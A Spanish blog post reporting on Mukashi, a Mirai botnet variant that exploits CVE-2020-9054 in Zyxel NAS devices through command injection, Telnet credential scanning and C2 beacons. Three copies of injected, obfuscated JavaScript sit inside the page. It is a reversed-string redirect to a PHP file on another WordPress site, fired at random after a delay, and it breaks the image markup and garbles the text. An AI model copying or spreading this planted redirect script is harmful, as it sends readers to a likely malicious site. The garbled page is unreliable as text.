Mukashi, la nueva variante de Mirai que explota los Nas Zyxel
Atacantes están utilizando un fallo de seguridad en los NAS de Zyxel para infectarlos con una nueva variante del troyano Mirai
Mukashi es el nombre que se le ha dado a la nueva variante de Mirai, el malware que infecta dispositivos IoT expuestos en Internet para añadirlos a su red de ‘bots’.
En este caso, se han detectado intentos de explotación de una vulnerabilidad para los NAS de Zyxel, identificada con CVE-2020-9054. Aunque Zyxel ya ha lanzado parches de seguridad que corrigen esta vulnerabilidad, los atacantes están tratando de aprovecharla e infectar aquellos dispositivos que aún no han sido parcheados.
Poco después de que se hiciese pública la prueba de concepto de la vulnerabilidad el mes pasado, los atacantes comenzaron a utilizar el exploit para distribuir Mukashi.
Este fallo de seguridad en los productos de Zyxel permite a un atacante ejecutar comandos en el sistema Linux de los mismos gracias a una petición HTTP que puede realizarse sin necesidad de autenticarse en el panel web de estos NAS.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tonetworks.com/wp-content/uploads/2020/03/Figure-1.-Exploit-request-spotted-in-the-wild.png?ssl=1″ width=”1894″ height=”194″ /></p>
<p>Petición realizada por los atacantes para explotar la vulnerabilidad e infectar el dispositivo<br />
En la imagen anterior podemos observar la petición que realizan los atacantes para infectar el dispositivo. Como podemos ver, se trata de una inyección de comandos que, en este caso, se aprovecha para descargar y ejecutar un script Bash que continuará con la siguiente fase de la infección.</p>
<p><img decoding=)
to fallará.
Una vez infectados, los dispositivos pasan a formar parte de la ‘botnet’, y su principal objetivo es infectar nuevos dispositivos a través del uso de credenciales por defecto o poco seguras en los servicios de Telnet.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tonetworks.com/wp-content/uploads/2020/03/Figure-3.-Scanning-TCP-port-23-of-random-hosts.png?ssl=1″ width=”1412″ height=”442″ /><br />
Escaneo de servidores Telnet de forma alea<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
toria
Una vez que se encuentra un servidor de Telnet con una contraseña poco segura, este es reportado al servidor de control para que pase a formar parte de la ‘botnet’. La conexión con el servidor de control (45[.]84[.]196[.]75) se realiza a través del puerto 34834.
El mensaje enviado para reportar un nuevo dispositivo encontrado y sus credenciales tiene la siguiente estructura:
<dirección IP>:23 <nombre de usuario>:<contraseña>
Además, Mukashi, enviará un mensaje al servidor de control para informar de que el dispositivo ha sido infectado y se encuentra listo a la espera de recibir comandos. Para ello envía el mensaje al puerto 4864 del servidor de control indicando si se está ejecutando como root y el primer parámetro con el que se ejecutó el malware, lo que permite identificar el método de infección (si se usó un exploit y cual) y la arquitectura del dispositivo.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tonetworks.com/wp-content/uploads/2020/03/Figure-6.-C2-beacon-from-the-x86-bot.png?ssl=1″ width=”260″ height=”15″ /></p>
<p>Mensaje enviado al C2 tras la infección</p>
<p>Si eres un usuario de dispositivos NAS de Zyxel, actualiza tu dispositivo lo antes posibles para estar protegido frente a este tipo de ataques.</p>
<p> </p>
<p> </p>
<p><a href=)
Ver información original al respecto en Fuente>
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.